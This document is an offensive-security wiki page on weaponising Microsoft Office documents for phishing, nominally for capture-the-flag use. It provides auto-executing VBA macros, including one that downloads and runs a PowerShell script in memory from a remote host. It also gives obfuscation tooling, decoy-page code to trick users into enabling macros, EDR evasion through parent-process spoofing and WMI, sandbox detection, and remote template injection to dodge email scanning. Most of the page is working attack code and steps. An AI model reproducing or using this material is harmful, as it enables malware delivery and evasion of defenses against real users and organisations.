Phishing - Office Documents

Word canary image

A canary image is an image in a Word document that will, whenever the document is opened in Microsoft Word or libreoffice, trigger a request to a remote URL.

In a Capture The Flag scenario requiring phishing, a canary image can be used to determine if the target is making use of Microsoft Word in order to pursue Word related attacks (such as office documents with macros, etc.).

The process to create a canary image in a Word .docx document is as follow:

  • Insert tab -> Quick Part -> Field

  • Categories: "Links and References"

  • IncludePicture -> "File name or URL": http://<IP>/canary.gif

Office documents with VBA macro

The OffensiveVBA GitHub repository centralizes a number of VBA code-snippets for code execution, sandboxes detection, persistence, etc.

Automatic macros ("auto macros")

General concept.

A number of macro names are associated with automatic execution upon realization of specific operations. The following macro names are associated by MS Office applications to automatic execution:

ApplicationMacro nameTriggering operation



Opening of an existing document.



Upon start of MS Word or loading of a global template.



Creation of a new document.



Closing of a document.



Upon exit of MS Word or unloading a global template.



Opening of the workbook.


Workbook_WindowResize(ByVal Wn As Excel.Window)

Resizing of the window of a workbook.


Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)

Before save of the workbook.


Workbook_AfterSave(ByVal Success As Boolean)

After save of the workbook.


Workbook_BeforeClose(Cancel As Boolean)

Before closing of the workbook.


Workbook_BeforePrint(Cancel As Boolean)

Before printing of the workbook.


Workbook_NewSheet(ByVal Sh As Object)

Creation of a new sheet.


Workbook_SheetActivate(ByVal Sh As Object)

Switching to a different sheet.


Workbook_SheetSelectionChange(ByVal Sh As Object, ByVal Target As Range)

Modification of a cell content.


Workbook_SheetBeforeDoubleClick(ByVal Sh As Object, ByVal Target As Range, Cancel As Boolean)

Before a double-click on a cell.


Workbook_SheetBeforeRightClick(ByVal Sh As Object, ByVal Target As Range, Cancel As Boolean)

Before a right-click on a cell.

A more comprehension list of the auto macros supported by Excel can be found in the official Microsoft documentation.

Automatic macro example.

The following VBA code execute the Test macro upon opening of the document containing the macro in MS Word (with AutoOpen) and MS Excel (with Workbook_Open):

'<OS_COMMAND> basic example to download and execute in memory a PowerShell script from a webserver: cmd /c powershell.exe -NoP -NoExit -W Hidden -Exec Bypass -c IEX (New-Object System.Net.Webclient).DownloadString('http://<IP>/<PS_SCRIPT>').

Sub Test()
   Dim code: code = "<OS_COMMAND>"
   Shell (code)
End Sub

Sub AutoOpen()
End Sub

Sub Workbook_Open()
End Sub

PowerShell code in VBA macro

The following Python script transforms a PowerShell command into a multi-lines VBA string declaration. It is notably useful for long obfuscated PowerShell command that doesn't fit into a single line VBA string declaration.

As an example, the scripts produces the following output:

# input PowerShell example, produced by Invoke-Obfuscation: cmd.exe /c PoWeRSheLL -exeCUtI BYPASs -noEXIT -COmma  "\"[...]')"

s0 = "PoWeRSheLL -exeCUtI BYPASs -noEXIT -COmma  ""\""$(SEt-vArIabLe  'Ofs' '') \"" + [ST"
s98 = "Mspec[4,26,25]-jOin'')"""

cmdStr = "cmd.exe /c " & s0 & s1 & s2 & s3 & s4 & s5 & s6 & s7 & s8 & s9 & s10 & s11
cmdStr = cmdStr & s89 & s90 & s91 & s92 & s93 & s94 & s95 & s96 & s97 & s98
powershell_file = r'<POWERSHELL_COMMAND_FILE>'

# Number of char to split the PowerShell command in
n = 80

with open(powershell_file, 'r') as f:
    file_content =
    print (file_content)
    substrings = [file_content[i:i+n] for i in range(0, len(file_content), n)]

    substring_index = 0
    for substring in substrings:
        if '"' in substring:
            substring = substring.replace('"', '""')
        if '\n' in substring:
            substring = substring.replace('\n', '')

        print (f'\ts{substring_index} = "{substring}"')
        substring_index = substring_index + 1

    concat_str = '\tcmdStr = "cmd.exe /c " & s0'
    if substring_index > 2:
        for i in range(1, substring_index - 1):
            if len(concat_str) > n:
                print (concat_str)
                concat_str = f'\tcmdStr = cmdStr & s{i}'
                concat_str = f'{concat_str} & s{i}'

    if substring_index > 1:
        concat_str = f'{concat_str} & s{substring_index - 1} & " # "" & :: "'

    print (concat_str)

Automated Office documents generation with macro_pack

macro_pack is a Python script that automatically obfuscate VBA macros and generate documents embedding macros. A "community version" is open sourced and a "pro version", that includes additional features, can be purchased.

The following output formats are supported by macro_pack (listed using macro_pack.exe --listformats):

  • Office documents:

    • Excel: .xlsm

    • Excel 97: .xls

    • Word: .docm

    • Word 97: .doc

    • PowerPoint: .pptm

    • Microsoft Project: .mpp

    • Visio: .vsdm

    • Visio97: .vsd

    • Access: .mdb

  • VB formats:

    • Visual Basic Script: .vbs

    • HTML Application: .hta

    • Windows Script Component: .sct

    • Windows Script File: .wsf

    • XSLT Stylesheet: .xsl

  • Shortcuts / others formats:

    • Shell Link: .lnk

    • Groove Shortcut: .glk

    • Explorer Command File: .scf

    • URL Shortcut: .url

    • Settings Shortcut: .SettingContent-ms

    • MS Library: .library-ms

    • Setup Information: .inf

    • Excel Web Query: .iqy

    • (Pro version only) SYmbolic LinK: .slk

    • (Pro version only) Compressed HTML Help: .chm

    • Command line: .cmd

    • Visual Studio Project: .csproj

Note that MS Office applications must be installed for the corresponding documents generation (MS Word, MS Excel, etc.).

# Generates a document incorporating the obfuscated VBA macro specified.
# The output document format will be automatically deducted by macro_pack from the given file extension.
macro_pack.exe -f "<VBA_TXT_FILE>" -o -G "<OUTPUT_FILE>"

# Opens the specified document, triggering AutoOpen / Workbook_Openuse macros. Useful for testing purposes.
macro_pack.exe --run "<FILE>"

Decoy document

The following VBA code snippets, from MacroPhishing, can be used to increase credibility of the scenario enticing the targeted user to enable the macro. The first page of the document, that can contain a message enticing macro activation, will be replaced by the second page of the document, that can be otherwise left hidden, upon activation of the macro. The second page can match the original subject / purpose of the document. Additionally, the macro automatically chooses not to save changes made to the document if the document is closed without saving. This allows the document to remain in its original state, with the first page being shown to the user and the second page hidden.

The following VBA code should be added to the main VBA auto-execute function:

Option Explicit
Dim oAppClass As New oAppClass
Public Sub AutoOpen()
ActiveDocument.Sections(1).Range.Font.Hidden = False
Set page1 = Selection.GoTo(What:=1, Which:=2, Name:=1).Bookmarks("\Page").Range
Set oAppClass.oApp = Word.Application
End Sub

A new class, called oAppClass should then be created and the following code added to the class. The class can be freely renamed, as long as the instantiation from the main VBA function (Dim oAppClass As New oAppClass) is updated.

Option Explicit
Public WithEvents oApp As Word.Application
Private Sub oApp_DocumentBeforeClose(ByVal Doc As Document, Cancel As Boolean)
Cancel = True
Application.Quit SaveChanges:=wdDoNotSaveChanges
End Sub

Spoofing the parent process and command line

Some Endpoint Detection and Response (EDR) products may rely on processes parent-child relationship to detect and eventually block malicious macro executions. Monitoring the process creation calls can for instance be used to detect MS Office applications spawning cmd.exe or powershell.exe. Processes' command line may also be scrutinized for malicious behavior.

In order to bypass EDR products that may implement such detection and blocking mechanism, a process can be created with a spoofed parent-process and command line. The technique can be conducted as follow:

  • Creation of the process in a suspended state with a legitimate-looking parent process (such as explorer.exe) and a seemingly harmless command line. The Win32's CreateProcess API indeed supports the specification of the parent process (parameter of type STARTUPINFOEX).

  • Modification of the command line in the created process's Process Environment Block (PEB) to the malicious command (which will the one actually executed).

  • Resume of the process.

VBA macros spawning a process with a spoofed parent and command line are available in the spoofing-office-macro GitHub repository.

Note that creation of a process in a suspended state can be identified as a malicious indicator by security products.

Another approach to break the parent-child relationship between office products and PowerShell / cmd.exe, can be to rely on the Win32_Process WMI class to start the process. By doing so, the child process will appear to have been started from WmiPrvSE.exe rather than an office product. The following VBA code snippet start a process in an hidden window:


strComputer = "."
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create("<PROCESS_CLI>", null, objConfig, intProcessID)

Anti-sanboxes detection

The following VBA code-snippet detect if the code is executed on a domain-joined computer, and exit if not. It can be used to detect if the macro is being executed in a emulated environment or sandboxe.

Sub CheckDomain()
On Error Resume Next
Set objRootDSE = GetObject("LDAP://RootDSE")
If Err.Number <> 0 Then
End If
On Error GoTo 0
End Sub

Remote template injection

In order to avoid embedding VBA code in an office document and having to send a file format supporting macro (such as .doc or .docm), a remote template can be included in a regular .docx file. The remote template will contain the (malicious) VBA code and will be injected upon opening of the document in Office. In additions to making the file more resilient to static analysis, relaying on a remote template can help circumvent some dynamic analysis techniques. For instance, the template can be made available on the remote server a few minutes after sending the document, so that eventual (immediate) scanning performed by emails gateway do not access the VBA code.

As with any VBA macro, the execution of the macro contained in the template is conditioned by the activation of the content by the user ("Enable content"). However, upon opening of the document, HTTP OPTIONS, HEAD, and GET requests will be sent to the webserver hosting the remote template, even if the macro are not enabled.

The generation process of a DOCX document with a remote template is as follow:

  1. Creation of a regular docx document (with a template). Online templates available through Office can be used as a starting point.

  2. Changing of the .docx extension to .zip.

  3. Extraction of the resulting zip archive (using 7zip for example).

  4. Modification of the Target attribute (of type attachedTemplate) in the <DOC_NAME>\word\_rels\settings.xml.rels file to point to the remote template. Example: Target="http://<IP>:443/Doc-template_with_macro.dotm"

  5. Saving of the modification in the settings.xml.rels file, rezipping of the files into a .docx (by zipping the subfolders and files in <DOC_NAME>\ and not the folder directly).


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